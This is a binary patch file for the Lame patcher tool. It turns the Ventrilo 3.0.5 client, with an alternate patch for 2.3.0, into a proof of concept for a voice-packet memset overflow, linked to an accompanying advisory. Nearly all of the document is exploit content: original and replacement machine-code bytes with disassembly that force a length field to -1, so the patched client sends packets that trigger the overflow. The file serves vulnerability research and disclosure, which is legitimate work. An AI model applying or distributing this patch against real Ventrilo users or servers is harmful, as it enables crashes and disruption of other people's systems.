====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step for Windows:
# - launch lpatch.exe
# - select this ventrilomemset.lpatch file
# - read the message windows and click yes
# - select the file (usually executables or dlls) to patch
# - read the message windows to know if everything has been patched correctly
# - test your game

TITLE
    Ventrilo <= 3.0.5 voice packet memset overflow 0.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:    aluigi.org

INTRO
    This patch converts a normal Ventrilo client 3.0.5 in a proof-of-concept
    for testing the vulnerability described here:
    .
    . http://aluigi.org/adv/ventrilomemset-adv.txt

FILE
    ventrilo.exe

    # 3.0.5
BYTES_ORIGINAL
    8B 56 08                ; MOV EDX,DWORD PTR DS:[ESI+8]
    89 50 14                ; MOV DWORD PTR DS:[EAX+14],EDX
    80 BB 9C 36 00 00 00    ; CMP BYTE PTR DS:[EBX+369C],0
    74 09                   ; JE SHORT Ventrilo.00446C7C
    B9 01 00 00 00          ; MOV ECX,1

BYTES_PATCH
    33 D2                   ; XOR EDX,EDX
    4A                      ; DEC EDX

    # 2.3.0
BYTES_ORIGINAL
    EB B4                   ; JMP SHORT Ventrilo.004231B6
    8B 4E 08                ; MOV ECX,DWORD PTR DS:[ESI+8]
    6A 00                   ; PUSH 0
    89 48 1C                ; MOV DWORD PTR DS:[EAX+1C],ECX

BYTES_PATCH
    ?? ??
    33 C9                   ; XOR ECX,ECX
    49                      ; DEC ECX

====================================================================================